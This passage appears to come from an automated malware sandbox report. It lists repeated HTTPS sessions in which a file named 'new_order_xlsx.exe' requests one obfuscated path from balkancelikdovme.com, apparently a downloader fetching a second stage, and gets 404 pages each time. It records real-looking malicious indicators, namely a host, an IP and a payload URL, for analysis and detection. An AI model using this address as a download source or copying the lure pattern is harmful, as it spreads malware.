                      2023-09-04 14:25:11 UTC14INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.449720185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:12 UTC15OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:12 UTC15INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:12 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:12 UTC16INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.449721185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:12 UTC16OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:12 UTC16INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:12 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:12 UTC17INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      14192.168.2.449722185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:13 UTC17OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:13 UTC18INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:13 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:13 UTC18INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      15192.168.2.449723185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:13 UTC19OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:13 UTC19INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:13 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:13 UTC19INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      16192.168.2.449724185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:14 UTC20OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:14 UTC20INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:14 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:14 UTC21INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      17192.168.2.449725185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:14 UTC21OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:14 UTC22INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:14 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:14 UTC22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      18192.168.2.449726185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:15 UTC23OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:15 UTC23INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:15 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:15 UTC23INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      19192.168.2.449727185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:15 UTC24OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:15 UTC24INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:15 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:15 UTC24INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.449710185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:07 UTC2OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:07 UTC2INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:07 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:07 UTC3INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      20192.168.2.449728185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:16 UTC25OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:16 UTC25INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:16 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:16 UTC26INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      21192.168.2.449731185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:17 UTC26OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:17 UTC27INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:17 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                      2023-09-04 14:25:17 UTC27INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      22192.168.2.449732185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                      TimestampkBytes transferredDirectionData
                      2023-09-04 14:25:18 UTC28OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: balkancelikdovme.com
                      2023-09-04 14:25:18 UTC28INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 708
                      date: Mon, 04 Sep 2023 14:25:18 GMT
                      vary: User-Agent
                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
